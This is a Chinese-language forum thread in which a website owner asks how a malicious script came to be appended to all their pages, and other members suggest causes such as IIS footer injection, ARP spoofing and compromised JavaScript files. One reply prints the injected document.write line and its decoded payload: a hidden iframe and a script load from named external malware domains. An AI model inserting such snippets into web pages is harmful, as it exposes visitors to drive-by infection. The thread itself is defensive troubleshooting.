返回列表 发帖

请高手帮忙解释一下这种马是如何挂上的,谢谢

我的站刚才被人挂马,在我所有站的每个页面的最后都出多出了一行代码
  1. document.write('<script src=http://51uuip.cn/uu/uuip1.png></script>');
复制代码
比如,我的的0506.html这个页的最后就多出来这样一段,但是我用 FTP把服务器上这个0506.html下载下来,却发现该文件里并没有这段代码,也就是说,这段代码只有用浏览器访问时才会被加上,麻烦高手们帮忙解释一下这个是如何实现的。
是不是服务器出了问题??

天色太晚了,没人了。。。。。

TOP

你的服务器应该被入侵了,你检查一下IIS的页脚设置和是不是被ARP了,都有可能出现你的说的那种情况的。
被插入页脚的可能性较大。
不要让生活磨灭我的性格!

TOP

网站有漏洞,服务器有漏洞,甚至于服务器被ARP欺骗攻击
均有可能被插入脚本....

具体问题具体分析,有时代码在网页中,有时也可能被插入到数据库...

TOP

这个是常见的JS挂马,你检查文件中是不是有这个类似的代码
“<script language=javascript src=XXXX.js></script>”

查看XXXX.js文件,里面有这样的代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
  1. http://51uuip.cn/uu/uuip1.png
复制代码
是做这样的解析:

document.write('<iframe src=http://mm.1d1d1d.com/rx/ingdfa01/new09.htm width=1 height=1></iframe>');document.write ('<script language="javascript" type="text/javascript" src="http://51uuip.cn/uu/tj.png"></script>');

http://mm.1d1d1d.com/rx/ingdfa01/new09.htm 是网页木马的地址。

你找到xxxx.js。删除相关代码就可以了。

[ 本帖最后由 mgmg 于 2008-6-12 12:03 编辑 ]

TOP

我认为源因有四点
一·ARP挂马
二·IIS挂马
三·JS挂马
四·conn.asp文件挂马
这四点你查一下,看是不是

TOP

可以先看一下网页挂马的方式。
http://www.baidu.com/s?ie=gb2312 ... 4%F3%C8%AB&ct=0
当然不单单这几种,主要看你对web和服务器的熟悉程度。
不要让生活磨灭我的性格!

TOP

感觉有点像我遇到的情况。

TOP

返回列表